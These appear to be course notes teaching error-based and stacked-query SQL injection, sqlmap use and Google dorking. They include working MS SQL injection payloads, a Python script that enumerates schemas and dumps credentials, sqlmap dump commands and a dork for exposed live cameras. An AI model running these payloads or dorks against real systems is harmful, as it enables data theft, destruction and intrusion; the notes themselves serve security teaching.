Mukezh

Session Error based

Dec 20th, 2018
=x=x
Session 11
Error Based Injection
============================

This type of SQL injection is usually taught against ASP/ASPX applications backed by Microsoft SQL Server, because MS SQL returns verbose type-conversion errors that carry the data. It is not limited to MS SQL, though: MySQL (extractvalue()/updatexml()), PostgreSQL and Oracle all have functions whose error messages can be made to echo an attacker-chosen value.
In error-based SQL injection the server does not display the query's data on the page; it displays it inside an error message. So instead of reading the data from the normal page content, as we did with union-based injection, we read it out of the error.

Error-based SQL injection works by forcing an error condition in the SQL (typically converting a string result to an integer), so that the database responds with an error message that contains the sensitive value.


=x=x=x=x=x==x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x

How an AND gate works:

A | B | A AND B |
--|---|---------|
0 | 0 |    0    | ---> 0 * 0 = 0 --> False
0 | 1 |    0    | ---> 0 * 1 = 0 --> False
1 | 0 |    0    | ---> 1 * 0 = 0 --> False
1 | 1 |    1    | ---> 1 * 1 = 1 --> True




Now the question arises: why are we studying AND gates?
The WHERE clause of the original query is a boolean condition, and the page shows a record only when that condition is true for some row. If we append "and 1=0" to the parameter, the whole condition becomes (original condition) AND false, which is false for every row, so the query returns nothing and the page changes (or, if the injected text breaks the syntax, the server shows an error). Appending "and 1=1" leaves the condition as it was, so the page looks normal. Comparing the two responses tells us that our input reaches the query.

So we produce the error at the injection point:

Below is a rough picture of how it looks:


www.abc.com/login/login.aspx?id=10 and 1=0;
                                \____ ____/
                                     \/
                          injected condition (1 AND 0)
--> 1 and 1=0; is a false condition
--> 1 and 1=1; is a true condition (many times it will show up the error as well.)


=x=x=x=x=x==x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x




CONDITIONS OF ERROR BASED SQL INJECTION
======================================
= Only one value can be extracted per query
(Not like testphp.vulnweb.com, where we had three vulnerable columns and put version() and database() in different places at the same time. An error message carries a single value, so here you cannot do that; TOP 1 is used to pick exactly one row.)

= Enumeration goes one item at a time, in whatever order the server returns rows
(TOP 1 returns the first row of the result. That order is not guaranteed, so to move to the next item you exclude the ones already seen with NOT IN rather than relying on the database handing them out in a fixed stack-like order.)

= Only one table name can be read at a time. The same goes for columns and then for rows.

Now let's look at the example below. Here we have 4 tables in the database of a Hotel Management System, and suppose the name of the site is www.abc.com.


DATABASE NAME : Hotel
Database Type : MS-SQL
=============================

Tables in Hotel: Vehicles, Dishes, Users, Room No.

Table Vehicles
|_Cars_|__Bikes__|__CYCLES__|
|_bmw__|__ninja__|__________|
|______|splendor_|__________|
|_Rols_|_________|__________|
|______|_________|_Ranger___|

Table Users
|Uname_|Password_|_Phone no.|
| AMY  | 1234556 |9911202912|
|Rohit |C@@als   |0098173723|
|Sanj  |Sanj1337 |9902132321|
|abhi  |Lucifer  |8976832132|
|Vivaan|0sh0@123 |8976032212|

(Dishes and Room No. are shown in the diagram without contents.)


Step 1 : A plain SELECT TOP 1 gives the first table name. The original query's column is an int, so MS SQL tries to convert the nvarchar table name to int for the UNION, fails, and prints the failing value in the error. (`--` comments out the rest of the original query; the `--+` form needed for MySQL is not required on MS SQL.)

www.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 table_name from information_schema.tables--


Output --> Vehicles (inside the error: Conversion failed when converting the nvarchar value 'Vehicles' to data type int.)

Step 2: We do not want the content of the table Vehicles, so we EXCLUDE that table with the "NOT IN" clause. MS SQL string literals use single quotes; double quotes denote identifiers.

www.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 table_name from information_schema.tables where table_name not in ('Vehicles')--
Output --> Dishes


Step 3: We do not want the table named Dishes either, so we add that table to the NOT IN list.

www.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 table_name from information_schema.tables where table_name not in ('Vehicles','Dishes')--
Output --> Users



Step 4: Now that we have the table name Users, we focus on getting its column names. Filter information_schema.columns by that table name; excluding the other tables instead would also return the columns of Room No.

www.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 column_name from information_schema.columns where table_name='Users'--
Output --> Uname


Step 5:
Exclude Uname the same way to get the next column name. Once the column names are known, the data itself is read with the same TOP 1 / NOT IN walk over the rows of Users, one value (or one concatenated row) per request.
www.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('Uname')--
Output --> Password
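The whole walk from Steps 1 to 5, automated, as an added example that is not part of the original notes. fake_target() is a constructed stand-in for www.abc.com/login/login.aspx?id=...: it holds the Hotel schema from the diagram above (with "Phone no." renamed Phone_no and "Room No." renamed Room_No so they are valid identifiers) and replies with the text MS SQL produces when the UNIONed nvarchar value is forced into the int column of the original query. Against a real page only fetch would change (an HTTP GET instead of the local function).

```python
"""Error-based enumeration of the Hotel database, Steps 1-5, automated.

Added example, not code from the original notes. fake_target() is a
constructed stand-in for www.abc.com/login/login.aspx?id=...: it holds
the Hotel schema from the diagram and replies with the error text MS SQL
produces when a UNIONed nvarchar value is forced into an int column.
"""
import re
from typing import Callable, List, Optional

# ---- attacker side --------------------------------------------------------

# Value MS SQL embeds in the message when the nvarchar -> int conversion fails.
ERR_VALUE = re.compile(r"converting the nvarchar value '(.*?)' to data type int")

def payload(subquery: str) -> str:
    """id parameter: 'and 1=0' empties the original result, the UNION supplies
    one nvarchar value that cannot be converted to the original int column."""
    return f"1 and 1=0 union {subquery}--"

def sql_list(values) -> str:
    return ",".join(f"'{v}'" for v in values)

def walk(fetch: Callable[[str], str], make_subquery, limit: int = 50) -> List[str]:
    """One value per request: TOP 1 picks a row, NOT IN excludes the ones
    already seen, and the walk ends when no error (no row left) comes back."""
    seen: List[str] = []
    while len(seen) < limit:
        m = ERR_VALUE.search(fetch(payload(make_subquery(seen))))
        if not m:
            break
        seen.append(m.group(1))
    return seen

def table_names(fetch) -> List[str]:
    def q(seen):
        base = "select top 1 table_name from information_schema.tables"
        return base + (f" where table_name not in ({sql_list(seen)})" if seen else "")
    return walk(fetch, q)

def column_names(fetch, table: str) -> List[str]:
    def q(seen):
        base = ("select top 1 column_name from information_schema.columns"
                f" where table_name='{table}'")
        return base + (f" and column_name not in ({sql_list(seen)})" if seen else "")
    return walk(fetch, q)

def dump_rows(fetch, table: str, cols: List[str]) -> List[str]:
    """Rows come back as 'a:b' strings; cols[0] must be unique per row."""
    expr = "+':'+".join(cols)   # string concatenation in T-SQL
    def q(seen):
        keys = [v.split(":", 1)[0] for v in seen]
        base = f"select top 1 {expr} from {table}"
        return base + (f" where {cols[0]} not in ({sql_list(keys)})" if seen else "")
    return walk(fetch, q)

# ---- constructed target (stands in for the vulnerable ASP.NET page) --------

SCHEMA = {"Vehicles": ["Cars", "Bikes", "CYCLES"], "Dishes": [],
          "Users": ["Uname", "Password", "Phone_no"], "Room_No": []}
ROWS = {"Users": [("AMY", "1234556", "9911202912"), ("Rohit", "C@@als", "0098173723"),
                  ("Sanj", "Sanj1337", "9902132321"), ("abhi", "Lucifer", "8976832132"),
                  ("Vivaan", "0sh0@123", "8976032212")]}
MSSQL_ERROR = "Conversion failed when converting the nvarchar value '{}' to data type int."
NORMAL_PAGE = "<html>login page</html>"

def _excluded(group: Optional[str]) -> List[str]:
    return [v.strip().strip("'") for v in group.split(",")] if group else []

def _evaluate(q: str) -> Optional[str]:
    """Tiny interpreter for the three query shapes the attacker side sends."""
    m = re.fullmatch(r"select top 1 table_name from information_schema\.tables"
                     r"(?: where table_name not in \((.*)\))?", q)
    if m:
        left = [t for t in SCHEMA if t not in _excluded(m.group(1))]
        return left[0] if left else None
    m = re.fullmatch(r"select top 1 column_name from information_schema\.columns"
                     r" where table_name='(\w+)'(?: and column_name not in \((.*)\))?", q)
    if m:
        left = [c for c in SCHEMA.get(m.group(1), []) if c not in _excluded(m.group(2))]
        return left[0] if left else None
    m = re.fullmatch(r"select top 1 (.+?) from (\w+)(?: where (\w+) not in \((.*)\))?", q)
    if not m:
        return None
    expr, table, key, lst = m.groups()
    idx = [SCHEMA[table].index(c) for c in expr.split("+':'+")]
    key_idx = SCHEMA[table].index(key) if key else 0
    left = [r for r in ROWS.get(table, []) if r[key_idx] not in _excluded(lst)]
    return ":".join(left[0][i] for i in idx) if left else None

def fake_target(id_param: str) -> str:
    m = re.fullmatch(r"1 and 1=0 union (select top 1 .*)--", id_param)
    value = _evaluate(m.group(1)) if m else None
    # An empty UNION branch converts nothing, so no error is raised at all.
    return MSSQL_ERROR.format(value) if value is not None else NORMAL_PAGE

if __name__ == "__main__":
    for t in table_names(fake_target):
        print(t, column_names(fake_target, t))
    print(dump_rows(fake_target, "Users", ["Uname", "Password"]))
```

The walk stops on the first response without the conversion error, which is also how you notice on a real target that the enumeration is complete (or that the server has started returning a generic error page instead of the raw message).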

=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=

STACKED QUERY SQL INJECTION
============================

Stacked query SQL injection terminates the original query with a semicolon and appends a new one. Because the appended statement is arbitrary, it can modify data and call stored procedures: creating, deleting and modifying the database and its entities, not just reading them. It depends on the database driver accepting several statements in one call, which MS SQL clients typically do and PHP's classic mysql_query() does not.

To see the criticality of stacked-query injection, take the example of a bank: if the database of bank.com is compromised and an attacker simply drops the database, i.e. deletes the whole information, every bank user will be running from place to place and getting nothing.

This can be done with automated SQL injection tools such as sqlmap.

=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x===x=

SQLMAP
=======
sqlmap is an open source Python-based penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine and many features, ranging from database fingerprinting, over fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

DEMONSTRATION ON KALI LINUX
============================
sqlmap is a CLI tool run from the terminal. It ships with Kali Linux, but being Python it runs on any OS that has Python installed. The steps to use this automated tool follow.

Target : http://testphp.vulnweb.com/

The first step is finding a GET parameter in the web application, and then enumerating it through sqlmap.

-> sqlmap

-> sqlmap --url "http://testphp.vulnweb.com/search.php?test=query"
(-u or --url gives the URL that carries the GET parameter to test)

-> sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" --dbs
(--dbs enumerates the databases reachable from that web application, the automated counterpart of injecting database() by hand)

-> sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables
(now we get the list of tables, specifying with -D that the database is "acuart")

-> sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --columns
(going a bit deeper, we enumerate the columns of a table by fixing the database with -D and the table name "users" with -T)

-> sqlmap --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --dump
(dumps all data of the table users to the terminal; sqlmap also saves it as a CSV under its output directory, whose path is printed at the end of the run)


That's how you get the juicy information out of the table...

=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=


GOOGLE DORKING
================
Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That includes information that is not intended for public viewing but that has not been adequately protected. Attackers use Google dorks to pull out exactly the data they want.

DORK COMMANDS
=================

= intitle: allows an attacker to search for pages with specific text in their HTML title. So intitle:"login page" helps find pages titled "login page".
= inurl: allows an attacker to search for pages based on text contained in the URL, e.g. inurl:login.php.
= intext: searches the entire content of a page for the keywords supplied by the attacker.
= site: limits the scope of a query to a single website (domain).
= cache: showed the attacker Google's cached (previously stored) copy of a page; Google retired this operator in 2024.
= filetype: restricts results to a particular file type/extension, e.g. filetype:xls.
= "index of": there is no indexof operator; the dork intitle:"index of" finds directory listings where a web server exposes a whole directory of files to browsing.

= Finding live cameras - inurl:"/view/view.shtml" returns live camera feeds from Axis devices.


Google Hacking Database --> GHDB -> https://www.exploit-db.com/google-hacking-database/


=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x